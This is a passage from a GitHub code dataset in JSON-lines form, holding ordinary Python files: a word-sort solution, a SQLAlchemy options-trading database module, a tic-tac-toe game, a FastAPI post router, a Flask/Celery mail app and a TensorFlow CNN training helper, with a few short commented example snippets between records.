range(len(data)) :\n 
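# [editor's sketch] A compact equivalent of the dedup-and-sort logic in the word-sort
# solution: set() removes duplicates and sorted's key orders by length, then text.
words = ["but", "i", "wont", "hesitate", "no", "more", "no", "more"]
for w in sorted(set(words), key=lambda w: (len(w), w)):
    print(w)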
print(data[i][1])","repo_name":"woodypef/tolife","sub_path":"Baekjoon/silver/silver5/[1181]단어정렬.py","file_name":"[1181]단어정렬.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27439943563","text":"import databases\nimport sqlalchemy\nfrom sqlalchemy.sql import text\nimport os\nfrom dotenv import load_dotenv\nload_dotenv(\".env\")\n\nDATABASE_URL = os.environ[\"DATABASE_URL\"]\nprint(DATABASE_URL)\n\nDB_MOTOR = os.environ[\"DB_MOTOR\"]\nDB_USER = os.environ[\"DB_USER\"]\nDB_PASSWORD = os.environ[\"DB_PASSWORD\"]\nDB_HOSTNAME = os.environ[\"DB_HOSTNAME\"]\nDB_PORT = os.environ[\"DB_PORT\"]\nDB_NAME = os.environ[\"DB_NAME\"]\nPGADMIN_EMAIL = os.environ[\"PGADMIN_EMAIL\"]\nPGADMIN_PASSWORD = os.environ[\"PGADMIN_PASSWORD\"]\n\n# DB_MOTOR + DB_USER +\":\"+DB_PASSWORD +\"@\" +DB_HOSTNAME +\":\" +DB_PORT +\"/\"+DB_NAME\n\nDATABASE_URL = \"{}{}:{}@{}:{}/{}\".format(\n DB_MOTOR,\n DB_USER,\n DB_PASSWORD,\n DB_HOSTNAME,\n DB_PORT,\n DB_NAME)\nprint(DATABASE_URL)\n\n#database = databases.Database(DATABASE_URL)\n\n\nmetadata = sqlalchemy.MetaData()\nengine = sqlalchemy.create_engine(DATABASE_URL)\ndatabase = engine.connect()\n\n\n\n\nregister_of_calls_and_puts_actions = sqlalchemy.Table(\n \"register_of_calls_and_puts_actions\",\n metadata,\n sqlalchemy.Column(\"id\", sqlalchemy.INT, primary_key=True),\n sqlalchemy.Column(\"symbol\", sqlalchemy.String),\n sqlalchemy.Column(\"candle_date\", sqlalchemy.DateTime),\n sqlalchemy.Column(\"open_value\", sqlalchemy.Float),\n sqlalchemy.Column(\"close_value\", sqlalchemy.Float),\n sqlalchemy.Column(\"action_type\", sqlalchemy.String),\n sqlalchemy.Column(\"call_or_put\", sqlalchemy.String),\n sqlalchemy.Column(\"strike\", sqlalchemy.Float),\n sqlalchemy.Column(\"ask_price\", sqlalchemy.Float),\n sqlalchemy.Column(\"bid_price\", sqlalchemy.Float),\n sqlalchemy.Column(\"status_of_action\", sqlalchemy.String),\n sqlalchemy.Column(\"order_date\", sqlalchemy.DateTime),\n)\n\nmetadata.create_all(engine)\n\ndef insert_data(symbol,\n candle_date,\n open_value,\n close_value,\n action_type,\n call_or_put,\n strike,\n ask_price,\n bid_price,\n status_of_action,\n order_date):\n query = register_of_calls_and_puts_actions.insert().values(\n symbol=symbol,\n candle_date=candle_date,\n open_value=open_value,\n close_value=close_value,\n action_type=action_type,\n call_or_put=call_or_put,\n strike=strike,\n ask_price=ask_price,\n bid_price=bid_price,\n status_of_action=status_of_action,\n order_date=order_date)\n database.execute(query)\n\n\ndef ask_purchases(status, symbol, call_or_put):\n list_of_purchases = []\n query = text(\n \"SELECT register_of_calls_and_puts_actions.symbol, \"\n \"register_of_calls_and_puts_actions.action_type, register_of_calls_and_puts_actions.candle_date, \" \n \"register_of_calls_and_puts_actions.strike , register_of_calls_and_puts_actions.ask_price ,\"\n \"register_of_calls_and_puts_actions.bid_price,id \"\n \"FROM register_of_calls_and_puts_actions \"\n \"WHERE register_of_calls_and_puts_actions.status_of_action LIKE :status AND \"\n \"register_of_calls_and_puts_actions.symbol LIKE :symbol AND \"\n \"register_of_calls_and_puts_actions.call_or_put LIKE :call_or_put\"\n )\n\n\n records = database.execute(query, {\"status\": status, \"symbol\": symbol, \"call_or_put\": call_or_put}).fetchall()\n records = list(records)\n print(records)\n for record in records:\n print(record)\n list_of_purchases.append(record)\n\n return 
list_of_purchases\n\n\ndef update_status_of_actions(strike, id):\n query = register_of_calls_and_puts_actions.update(). \\\n where(register_of_calls_and_puts_actions.c.id == id).\\\n values(status_of_action=\"sold\", strike=strike)\n database.execute(query)\n\n\n\n\nif __name__ == '__main__':\n from datetime import datetime\n insert_data(symbol=\"AAPL\",\n candle_date=\"2021-10-04 09:30:00\",\n open_value=1.1,\n close_value=2.2,\n action_type=\"put condition 1\",\n call_or_put=\"put\",\n strike=3.3,\n ask_price=4.4,\n bid_price=5.5,\n status_of_action=\"on possession\",\n order_date=datetime.now())\n\n ask_purchases(status=\"on possession\", symbol=\"AAPL\", call_or_put=\"call\")\n\n\"\"\"\n\nregister_of_calls_and_puts_actions.c.symbol,\nregister_of_calls_and_puts_actions.c.action_type,\nregister_of_calls_and_puts_actions.c.candle_date,\nregister_of_calls_and_puts_actions.c.strike,\nregister_of_calls_and_puts_actions.c.ask_price,\nregister_of_calls_and_puts_actions.c.bid_price,\nregister_of_calls_and_puts_actions.c.id]\n\"\"\"\n","repo_name":"webclinic017/ameritrade_public","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35300032104","text":"import random\n\n\"\"\"\n\n\"\"\"\n\nclass TicTacToe:\n \n def __init__(self):\n\n #board will be 3x3 matrix\n self.board = [[\" \",\" \",\" \"],[\" \",\" \",\" \"],[\" \",\" \",\" \"]]\n\n #X will start\n self.turn = \"X\"\n\n #server will be X\n self.you = \"X\"\n\n #client will be O\n self.opponenet = \"O\"\n\n #check who is the winner\n self.winner = None\n\n #check if game is over\n self.game_over = False\n\n #check how many moves have been played.\n #if all 9 moves have been played there are no more moves and it's a tie.\n self.counter = 0\n\n self.handle_connection()\n\n #function that handles game play\n def handle_connection(self):\n\n #as long as game is not over a player can make a move\n while not self.game_over:\n\n #if it's your turn you can make a move\n #else, wait for opponent (computer) to make a move\n if self.turn == self.you:\n move = input(\"Enter a move (row, column):\")\n if self.check_valid_move(move.split(\",\")):\n self.apply_move(move.split(\",\"), self.you)\n self.turn = self.opponenet\n else:\n print(\"Invalid move\")\n else:\n move = [random.randint(0,2), random.randint(0,2)]\n if self.check_valid_move(move):\n self.apply_move(move, self.opponenet)\n self.turn = self.you\n\n #if game is over end the program\n quit()\n\n #execute a player's move\n #note: the move argument is transformed into a list[] via move.split(\",\")\n def apply_move(self, move, player):\n\n if self.game_over:\n return\n \n #increase counter by 1 to track how many moves have been made\n self.counter += 1\n\n #put player's move at indicated spot on board and display board\n self.board[int(move[0])][int(move[1])] = player\n self.print_board()\n\n #check if there's a winner or if it's a tie\n if self.check_if_won():\n if self.winner == self.you:\n print(\"You win\")\n exit()\n elif self.winner == self.opponenet:\n print(\"You lose\")\n exit()\n else:\n if self.counter == 9:\n print(\"It is a tie\")\n exit()\n\n #check if move is valid\n #note: move argument transformed into list[] via move.split(\",\")\n def check_valid_move(self, move):\n if (move[0] and move[1]) and self.board[int(move[0])][int(move[1])] == \" \":\n return self.board[int(move[0])][int(move[1])] == \" \"\n else:\n 
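# [editor's sketch] The bound-parameter pattern ask_purchases uses: sqlalchemy.text()
# with :named placeholders keeps user values out of the SQL string. The in-memory
# SQLite engine and the tiny table here are for demonstration only.
import sqlalchemy
from sqlalchemy.sql import text

engine = sqlalchemy.create_engine("sqlite://")
with engine.connect() as conn:
    conn.execute(text("CREATE TABLE t (symbol TEXT, status TEXT)"))
    conn.execute(text("INSERT INTO t VALUES ('AAPL', 'on possession')"))
    rows = conn.execute(
        text("SELECT symbol FROM t WHERE status LIKE :status"),
        {"status": "on possession"},
    ).fetchall()
print(rows)  # [('AAPL',)]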
return False\n \n \n #check for a winner\n def check_if_won(self):\n\n #check for a winning row\n for row in range(3):\n if self.board[row][0] == self.board[row][1] == self.board[row][2] != \" \":\n self.winner = self.board[row][0]\n self.game_over = True\n return True\n \n #check for a winning column\n for col in range(3):\n if self.board[0][col] == self.board[1][col] == self.board[2][col] != \" \":\n self.winner = self.board[0][col]\n self.game_over = True\n return True\n \n #check for the first diagonal\n if self.board[0][0] == self.board[1][1] == self.board[2][2] != \" \":\n self.winner = self.board[0][0]\n self.game_over = True\n return True\n\n #check for the second diagonal \n if self.board[0][2] == self.board[1][1] == self.board[2][0] != \" \":\n self.winner = self.board[0][2]\n self.game_over = True\n return True\n\n #if no winners, return False \n return False\n \n #display board in the console\n def print_board(self):\n for row in range(3):\n print(\" | \".join(self.board[row]))\n if row != 2:\n print(\"--------------\")\n if row == 2:\n print(\"\\n\\n_____________\\n\\n\")\n\n#the game loop starts automatically: __init__ calls handle_connection()\ngame = TicTacToe()\n","repo_name":"haileyneorsd/tictactoe_single_python","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16871441868","text":"from typing import List\n\nfrom fastapi import Depends, APIRouter, HTTPException\n\nfrom schemas import Post, PostCreate, PostResponse\nfrom repo.auth_repo import auth_repo\nfrom repo.post_repo import post_repo\n\npost_route = APIRouter()\n\n\n@post_route.get(\"/{post_id}\", response_model=Post, tags=[\"posts\"])\ndef find_by_id(post_id: int):\n result = post_repo.find_by_id(post_id=post_id)\n if result is None:\n raise HTTPException(\n status_code=404,\n detail=\"POST_NOT_FOUND\",\n )\n return result\n\n\n@post_route.get(\"/\", response_model=List[PostResponse], tags=[\"posts\"])\ndef find(limit: int = 10, skip: int = 0):\n return post_repo.find(limit=limit, skip=skip)\n\n\n@post_route.get(\"/{post_id}/comment\", response_model=Post, tags=[\"posts\"])\ndef find_comment(post_id: int):\n return post_repo.find_comment(post_id=post_id)\n\n\n@post_route.post(\"/\", response_model=Post, tags=[\"posts\"])\ndef create(data: PostCreate, user=Depends(auth_repo.validate_token)):\n return post_repo.create(data=data, user_id=user.id)\n\n\n@post_route.patch(\"/{post_id}\", tags=[\"posts\"])\ndef update(post_id: int, data: PostCreate, user=Depends(auth_repo.validate_token)):\n result = post_repo.update(\n data=data, post_id=post_id, user_id=user.id)\n if result is None:\n raise HTTPException(\n status_code=404,\n detail=\"POST_NOT_FOUND\",\n )\n\n return result\n\n\n@post_route.delete(\"/{post_id}\", tags=[\"posts\"])\ndef delete(post_id: int, user=Depends(auth_repo.validate_token)):\n result = post_repo.delete(post_id=post_id, user_id=user.id)\n if result is None:\n raise HTTPException(\n status_code=404,\n detail=\"POST_NOT_FOUND\",\n )\n\n return result","repo_name":"prd-tai-nguyen/demo-fastapi","sub_path":"src/controllers/post_controller.py","file_name":"post_controller.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"612414853","text":"from flask import Flask\nfrom flask_mail import Mail, Message\nfrom 
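# [editor's sketch, not the submitted code] A table-driven alternative to the four
# near-identical row/column/diagonal checks above: enumerate the eight winning
# triples once and scan them.
LINES = [[(r, 0), (r, 1), (r, 2)] for r in range(3)] + \
        [[(0, c), (1, c), (2, c)] for c in range(3)] + \
        [[(0, 0), (1, 1), (2, 2)], [(0, 2), (1, 1), (2, 0)]]

def winner_of(board):
    for line in LINES:
        a, b, c = (board[r][col] for r, col in line)
        if a == b == c != " ":
            return a
    return None

print(winner_of([["X", "X", "X"], [" ", "O", " "], ["O", " ", " "]]))  # X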
flask_restful import Api, Resource\nimport config\nfrom tasks import make_celery\n\napp = Flask(__name__)\napi = Api(app)\napp.config['CELERY_BROKER_URL'] = 'amqp://guest:@rabbit:5672//' #here rabbit refers to service in docker-compose file\napp.config['CELERY_RESULT_BACKEND'] = 'db+sqlite:///db.sqlite3'\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USE_SSL'] = True\napp.config['MAIL_USERNAME'] = config.MAIL_USERNAME\napp.config['MAIL_PASSWORD'] = config.MAIL_PASSWORD\n\ncelery = make_celery(app)\nmail = Mail(app)\n\n\nclass MailApi(Resource):\n def get(self):\n send_mail.delay()\n return \"task is assigned!\"\n\n\n@celery.task(name='send_mail')\ndef send_mail():\n msg = Message(\"MAIL API\", sender='', recipients=[''])\n msg.body = \"This is the email body\"\n mail.send(msg)\n return \"Mail Sent!\"\n\n\napi.add_resource(MailApi, '/mailapp')\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n","repo_name":"maulikpanchal16/dockerise-celery-rabbitmq-mail_app","sub_path":"mail_app.py","file_name":"mail_app.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28193466365","text":"import tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport smtplib\nimport socket\nfrom time import time\ndef create_graph_bools(train_batch,layers,test_batch,mode='train',first_run=True,\n\tstddev_n = 0.1, learning_rate = 1e-4,iters=1,min_train_loss=1e-8,\n model_file='test_model',batch_proc=True, \n\twidth=256,height=256,input_mode='CNN',\n\treduce_noise=False,rn_shift=0.15,rn_magnitude=0.8,\n get_deconv=False,deconv_layer='CV2',deconv_val = 'conv',\n auto_test={'bool':False,'test_interval':2,'stop_max':True,'max_iters':10,\n 'fn_inc':2,'fp_inc':2,'train_rate_stop':1e-8,'restore_session':False}):\n if mode == 'train':\n test_batch_bool=False\n only_feed_forward=False\n if first_run == True:\n restore_session = False\n else:\n restore_session = True\n save_model = True\n elif mode == 'test':\n test_batch_bool=True\n only_feed_forward=True\n restore_session = True\n save_model = False\n elif mode == 'evaluate':\n test_batch_bool=False\n only_feed_forward=True\n restore_session = False\n save_model = False\n\n train_stats = []\n test_stats = []\n if auto_test['bool']==False:\n create_graph_return = create_graph(train_batch,layers=layers,test_batch=test_batch,\n width=width,height=height, test_batch_bool=test_batch_bool,only_feed_forward=only_feed_forward,\n restore_session = restore_session, save_model = save_model, stddev_n = stddev_n, \n learning_rate = learning_rate,iters=iters,min_train_loss=min_train_loss,model_file=model_file,input_mode=input_mode,\n reduce_noise=reduce_noise,rn_shift=rn_shift,rn_magnitude=rn_magnitude,\n get_deconv=get_deconv,deconv_layer=deconv_layer,deconv_val = deconv_val)\n else:\n\n learning_rate_down = learning_rate\n print(\"Auto test start\")\n train_interval = auto_test['max_iters']//auto_test['test_interval']\n def auto_test_module(learning_rate_down=learning_rate,fpx_base=0,fnx_base=0,giter=0,restore=False):\n test_layers = []\n for layer in layers:\n test_layers.append(layer.copy())\n train_layers = []\n for layer in layers:\n train_layers.append(layer.copy())\n\n \n test_batch_bool=False\n save_model = True\n only_feed_forward=False\n if restore==False:\n if giter ==0:\n restore_session = False\n else:\n restore_session = True\n else:\n restore_session = True\n 
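# [editor's sketch -- an assumption, not the repo's code] tasks.make_celery is not
# shown in the mail_app.py record above; the conventional Flask/Celery factory it
# presumably resembles looks roughly like this:
from celery import Celery

def make_celery(app):
    celery = Celery(app.import_name,
                    broker=app.config['CELERY_BROKER_URL'],
                    backend=app.config['CELERY_RESULT_BACKEND'])

    class ContextTask(celery.Task):
        # run every task inside the Flask application context
        def __call__(self, *args, **kwargs):
            with app.app_context():
                return self.run(*args, **kwargs)

    celery.Task = ContextTask
    return celery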
iters=auto_test['test_interval']\n create_graph_return = create_graph(train_batch,layers=train_layers,test_batch=test_batch,\n width=width,height=height, test_batch_bool=test_batch_bool,only_feed_forward=only_feed_forward,\n restore_session = restore_session, save_model = save_model, stddev_n = stddev_n, \n learning_rate = learning_rate_down,iters=iters,min_train_loss=min_train_loss,model_file=model_file,input_mode=input_mode,\n reduce_noise=reduce_noise,rn_shift=rn_shift,rn_magnitude=rn_magnitude,\n get_deconv=get_deconv,deconv_layer=deconv_layer,deconv_val = deconv_val)\n #{'tp':tpo,'tn':tno,'fp':fpo,'fn':tno,'sensitivity':o_sensitivity,'specificity':o_specificity}\n\n local_test_layers = []\n for layer in test_layers:\n local_test_layers.append(layer.copy())\n test_batch_bool=True\n only_feed_forward=True\n restore_session = True\n save_model = False\n create_graph_return_test = create_graph(train_batch,layers=test_layers,test_batch=test_batch,\n width=width,height=height, test_batch_bool=test_batch_bool,only_feed_forward=only_feed_forward,\n restore_session = restore_session, save_model = save_model, stddev_n = stddev_n, \n learning_rate = learning_rate_down,iters=iters,min_train_loss=min_train_loss,model_file=model_file,input_mode=input_mode,\n reduce_noise=reduce_noise,rn_shift=rn_shift,rn_magnitude=rn_magnitude,\n get_deconv=get_deconv,deconv_layer=deconv_layer,deconv_val = deconv_val)\n fpx_test = create_graph_return_test['stats']['fp']\n fnx_test = create_graph_return_test['stats']['fn']\n if giter==0:\n fpx_base=fpx_test\n fnx_base=fnx_test\n else:\n fpx_diff = fpx_test - fpx_base\n fnx_diff = fnx_test - fnx_base\n print(\"previous fp:\",fpx_base,\"new fp:\",fpx_test)\n print(\"previous fn:\",fnx_base,\"new fn:\",fnx_test)\n if (fpx_diff > auto_test['fp_inc']) or (fnx_diff > auto_test['fn_inc']):\n learning_rate_down = learning_rate_down/10\n print(\"New learning_rate:\",learning_rate_down)\n fpx_base=fpx_test\n fnx_base=fnx_test \n return [learning_rate_down,fpx_base,fnx_base,create_graph_return_test['stats'].copy(),create_graph_return_test['training_message']]\n \n def loop_stat(list_stat,lr):\n st=\"\"\n for stx,lrx in zip(list_stat,lr):\n st+=str(stx)+\" | learning rate: \"+str(lrx)+\"\\n\"\n return st\n \n learning_rate_list=[]\n err_message=\"\"\n giter=0\n fpx_base,fnx_base=0,0\n st = time()\n if auto_test['stop_max']==True:\n for giter in range(giter,train_interval):\n print(\"Global iter:\",giter,\"/\",train_interval)\n print(learning_rate_down,auto_test['train_rate_stop'])\n learning_rate_down,fpx_base,fnx_base,stats,train_msg = auto_test_module(learning_rate_down,fpx_base,fnx_base,giter=giter,restore=auto_test['restore_session'])\n if train_msg=='min_train_loss':\n print(\"End by training loss\")\n err_message=\"End by training loss\"\n break;\n if learning_rate_down < auto_test['train_rate_stop']:\n print(\"End by learning rate\")\n break;\n test_stats.append(stats)\n learning_rate_list.append(learning_rate_down)\n if (stats['tp']==0) and (stats['fp']==0):\n print(\"Error\")\n err_message=\"Loss: nan found\"\n break;\n else:\n while (learning_rate_down>auto_test['train_rate_stop']):\n print(\"Global iter:\",giter)\n print(learning_rate_down,auto_test['train_rate_stop'])\n learning_rate_down,fpx_base,fnx_base,stats,train_msg = auto_test_module(learning_rate_down,fpx_base,fnx_base,giter=giter,restore=auto_test['restore_session'])\n test_stats.append(stats)\n learning_rate_list.append(learning_rate_down)\n giter+=1\n if train_msg=='min_train_loss':\n print(\"End by 
training loss\")\n err_message=\"End by training loss\"\n break;\n if (stats['tp']==0) and (stats['fp']==0):\n print(\"Error\")\n err_message=\"Loss: nan found\"\n break;\n email_keys = ['send_email_bool','email_origin','email_pass','email_destination']\n time_taken = np.ceil((time() - st)/60)\n if bool(list(filter(lambda x: x in list(auto_test.keys()),email_keys))):\n if auto_test['send_email_bool']==True:\n content=\"stats:\\n \"+loop_stat(test_stats,learning_rate_list)+\" \\n \"+err_message+\"\\n\"\n #send_mail(email_origin,email_destination,email_pass,subject=\"Test report\",content=\"Test\")\n email_org = auto_test['email_origin']\n email_pass = auto_test['email_pass']\n email_dest = auto_test['email_destination']\n email_subj = \"Model \"+model_file+\" evaluation completed: \"\n email_subj += socket.gethostname()+\" Max-iter \"+str(auto_test['stop_max'])\n email_subj += \"iters: \"+str(giter)+ \" Minutes taken: \"+str(time_taken)\n send_mail(email_org,email_dest,email_pass,subject=email_subj,content=content)\n create_graph_return={'stats':10}\n return create_graph_return.copy()\n\n\n\ndef get_previous_features(i_layer):\n convx_dims = i_layer.get_shape().as_list()\n output_features = 1\n for dim in range(1,len(convx_dims)):\n output_features=output_features*convx_dims[dim]\n return output_features\ndef create_conv(iDic,input_layer,iName,prev_dic,stddev_n = 0.1,norm_offset=0,norm_scale=1,norm_epsilon=1e-6):\n W_name = \"W\"+iName\n b_name = \"b\"+iName\n Z_name = \"Z\"+iName\n conv_name = \"conv\"+iName\n relu_name = \"relu\"+iName\n maxpool_name = \"maxpool\"+iName\n keep_prob_name = 'keep_prob'+iName\n dropout_name = 'dropout'+iName\n if prev_dic['type']=='CV':\n iDic['input_depth']=prev_dic['depth']\n elif prev_dic['type']=='input_layer':\n if 'prev_channels' in iDic.keys():\n iDic['input_depth']=iDic['prev_channels']\n else:\n iDic['input_depth']=1\n if iDic['type']=='CV':\n iDic['W'] = tf.Variable(tf.truncated_normal([iDic['filter_w'], iDic['filter_w'], iDic['input_depth'], iDic['depth']], stddev=stddev_n),name=W_name)\n iDic['b'] = tf.Variable(tf.constant(stddev_n, shape=[iDic['depth']]),name=b_name)\n iDic['conv']= tf.nn.conv2d(input_layer, iDic['W'], strides=iDic['filter_stride'], padding='SAME',name=conv_name) + iDic['b']\n if 'norm_bool' in iDic.keys():\n if iDic['norm_bool']==True:\n iDic['mean'], iDic['variance'] = tf.nn.moments(iDic['conv'],[0,1,2])\n iDic['norm'] = tf.nn.batch_normalization(iDic['conv'],iDic['mean'],iDic['variance'],norm_offset,norm_scale,norm_epsilon)\n iDic['relu']= tf.nn.relu(iDic['norm'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['conv'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['conv'],name=relu_name)\n if 'max_pooling' in iDic.keys():\n if iDic['max_pooling']==True:\n iDic['max'] = tf.nn.max_pool(iDic['relu'], ksize=iDic['max_pool_mask'],strides=iDic['max_pool_stride'], padding=iDic['padding'])\n iDic['output_label']='max'\n else:\n iDic['output_label']='relu'\n else:\n iDic['output_label']='relu'\n elif iDic['type']=='CV2FC':\n vc_input_features = get_previous_features(input_layer)\n iDic['input_layer'] = tf.reshape(input_layer, [-1, vc_input_features])\n\n if 'x2_bool' in iDic.keys():\n if iDic['x2_bool'] == True:\n iDic['x2'] = tf.placeholder(tf.float32, shape=[None, iDic['x2_features']])\n input_layer_mod = tf.concat([iDic['input_layer'],iDic['x2']],1)\n else:\n input_layer_mod = iDic['input_layer']\n else:\n input_layer_mod = iDic['input_layer']\n iDic['input_features'] = get_previous_features(input_layer_mod)\n\n 
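# [editor's sketch, TF1-style to match this file] The normalization recipe used in
# create_conv, in isolation: tf.nn.moments computes per-channel mean/variance, then
# tf.nn.batch_normalization applies (x - mean) / sqrt(var + eps) * scale + offset.
import tensorflow as tf
import numpy as np

g = tf.Graph()
with g.as_default():
    x = tf.constant(np.random.rand(4, 8, 8, 3), dtype=tf.float32)
    mean, var = tf.nn.moments(x, [0, 1, 2])
    y = tf.nn.batch_normalization(x, mean, var, offset=0.0, scale=1.0,
                                  variance_epsilon=1e-6)
    with tf.Session(graph=g) as s:
        print(s.run(y).shape)  # (4, 8, 8, 3)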
iDic['W'] = tf.Variable(tf.truncated_normal([iDic['input_features'], iDic['neurons']], stddev=stddev_n),name=W_name)\n iDic['b'] = tf.Variable(tf.constant(stddev_n, shape=[iDic['neurons']]),name=b_name) \n iDic['Z'] = tf.matmul(input_layer_mod, iDic['W'],name=Z_name) + iDic['b']\n if 'norm_bool' in iDic.keys():\n if iDic['norm_bool']==True:\n iDic['mean'], iDic['variance'] = tf.nn.moments(iDic['Z'],[0])\n iDic['norm'] = tf.nn.batch_normalization(iDic['Z'],iDic['mean'],iDic['variance'],norm_offset,norm_scale,norm_epsilon)\n iDic['relu']= tf.nn.relu(iDic['norm'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['Z'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['Z'],name=relu_name)\n if 'drop_out_bool' in iDic.keys():\n if iDic['drop_out_bool'] == True:\n iDic['keep_prob'] = tf.placeholder(tf.float32,name=keep_prob_name)\n iDic['dropout'] = tf.nn.dropout(iDic['relu'], iDic['keep_prob'],name=dropout_name)\n iDic['output_label']='dropout'\n else:\n iDic['output_label']='relu'\n else:\n iDic['output_label']='relu'\n elif iDic['type']=='FC':\n if 'x2_bool' in iDic.keys():\n if iDic['x2_bool'] == True:\n iDic['x2'] = tf.placeholder(tf.float32, shape=[None, iDic['x2_features']])\n input_layer_mod = tf.concat([input_layer,iDic['x2']],1)\n else:\n input_layer_mod = input_layer\n else:\n input_layer_mod = input_layer\n iDic['input_features'] = get_previous_features(input_layer_mod)\n iDic['W'] = tf.Variable(tf.truncated_normal([iDic['input_features'], iDic['neurons']], stddev=stddev_n),name=W_name)\n iDic['b'] = tf.Variable(tf.constant(stddev_n, shape=[iDic['neurons']]),name=b_name) \n iDic['Z'] = tf.matmul(input_layer_mod, iDic['W'],name=Z_name) + iDic['b']\n if 'norm_bool' in iDic.keys():\n if iDic['norm_bool']==True:\n iDic['mean'], iDic['variance'] = tf.nn.moments(iDic['Z'],[0])\n iDic['norm'] = tf.nn.batch_normalization(iDic['Z'],iDic['mean'],iDic['variance'],norm_offset,norm_scale,norm_epsilon)\n iDic['relu']= tf.nn.relu(iDic['norm'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['Z'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['Z'],name=relu_name)\n if 'drop_out_bool' in iDic.keys():\n if iDic['drop_out_bool'] == True:\n iDic['keep_prob'] = tf.placeholder(tf.float32,name=keep_prob_name)\n iDic['dropout'] = tf.nn.dropout(iDic['relu'], iDic['keep_prob'],name=dropout_name)\n iDic['output_label']='dropout'\n else:\n iDic['output_label']='relu'\n else:\n iDic['output_label']='relu'\ndef balance_positive_negative(iNp,iBatchSize=256,v=False):\n negative_examples = iNp[iNp[:,-1]==0]\n positive_examples = iNp[iNp[:,-1]==1]\n mini_batch_size_half = iBatchSize//2\n negative_examples_m = negative_examples.shape[0]\n positive_examples_m = positive_examples.shape[0]\n positive_batches = positive_examples_m//mini_batch_size_half\n positive_batch_residual = positive_examples_m%mini_batch_size_half\n negative_batches = negative_examples_m//mini_batch_size_half\n negative_batch_residual = negative_examples_m%mini_batch_size_half\n balanced_batches = min(positive_batches,negative_batches)\n\n batch_list = []\n for batch in range(0,balanced_batches):\n start_batch = batch*mini_batch_size_half\n end_batch = (batch+1)*mini_batch_size_half\n _ = np.concatenate((positive_examples[start_batch:end_batch,:],negative_examples[start_batch:end_batch,:]),0)\n xTemp = (_[:,:-1]).astype('float32')\n xTemp=xTemp/255.0\n yTemp = _[:,-1]\n yTemp = np.asarray(pd.get_dummies(yTemp))\n batch_list.append([xTemp,yTemp])\n if v==True:\n print(\"Pos batches\",positive_batches,\"Pos 
res\",positive_batch_residual)\n print(\"Neg batches\",negative_batches,\"Neg res\",negative_batch_residual)\n print(\"Selected batches number\",balanced_batches)\n print(\"#batches\",len(batch_list))\n return batch_list.copy()\ndef plot_list(iList,figsize=(10,8),title=\"Loss/Eff\",xlabel=\"Iters\",ylabel=\"Loss/Eff\"): \n plt_loss = np.asarray(iList)\n fig = plt.figure(figsize=figsize)\n plt.plot(np.arange(0,plt_loss.size),plt_loss)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.title(title)\n plt.show()\n##############\ndef create_graph(train_batch,layers,test_batch=None,width=256,height=256,\n batch_proc=True, test_batch_bool=False,\n restore_session = False, save_model = False, only_feed_forward=False,\n stddev_n = 0.1, learning_rate = 1e-4,iters=4,min_train_loss=1e-8,\n model_file='CNN_model',\n input_mode='CNN',wf=0.8,ws=0.3,batch_size=8,\n reduce_noise=False,rn_shift=0.15,rn_magnitude=0.8,\n get_deconv=True,deconv_layer='CV2',deconv_val = 'conv'):\n _x_batch = train_batch[0][0]\n _y_batch = train_batch[0][1]\n class_output = _y_batch.shape[1]\n \n tf.reset_default_graph()\n\n x_flat = width * height\n x = tf.placeholder(tf.float32, shape=[None, x_flat])\n y_ = tf.placeholder(tf.float32, shape=[None, class_output])\n\n##################Add Noise\n\n amp = tf.constant(255.0)\n epsilon_e = 1e-4\n Wf = tf.Variable(rn_magnitude)\n Ws = tf.Variable(rn_shift)\n pow_lim = 20.0\n gen_f = pow_lim/amp\n\n##########################\n\n\n\n\n\n input_layer_dic = {'type':'input_layer'}\n if input_mode=='CNN':\n x_image = tf.reshape(x, [-1,width,height,1])\n #input_layer_dic['output_label']='x_image'\n #input_layer_dic['x_image']=x_image\n \n if reduce_noise==True:\n \n f1 = tf.constant([[1.0,0,-1.0],[1.0,0,-1.0],[1.0,0,-1.0]])\n f2 = tf.transpose(f1)\n f3 = tf.constant([[1.0,0,1.0],[0,0,0],[-1.0,0,-1.0]])\n f4 = tf.transpose(f3)\n f1r = tf.reshape(f1,[3,3,1,1])\n f2r = tf.reshape(f2,[3,3,1,1])\n f3r = tf.reshape(f3,[3,3,1,1])\n f4r = tf.reshape(f4,[3,3,1,1])\n cv1 = tf.abs(tf.nn.conv2d(x_image, f1r, strides=[1,1,1,1], padding='SAME'))\n cv2 = tf.abs(tf.nn.conv2d(x_image, f2r, strides=[1,1,1,1], padding='SAME'))\n cv3 = tf.abs(tf.nn.conv2d(x_image, f3r, strides=[1,1,1,1], padding='SAME'))\n cv4 = tf.abs(tf.nn.conv2d(x_image, f4r, strides=[1,1,1,1], padding='SAME'))\n cvM = cv1+cv2+cv3+cv4\n cvMn = cvM/(tf.reduce_max(cvM)-tf.reduce_min(cvM))\n powf = gen_f*Wf*(amp*cvMn-amp*Ws+epsilon_e)\n noise_red = tf.divide(1.0,tf.add(1.0,tf.exp(-powf)))\n input_layer_dic['output_label']='x_image'\n input_layer_dic['x_image']=noise_red\n else:\n input_layer_dic['output_label']='x_image'\n input_layer_dic['x_image']=x_image\n \n elif input_mode=='noise':\n #powf = 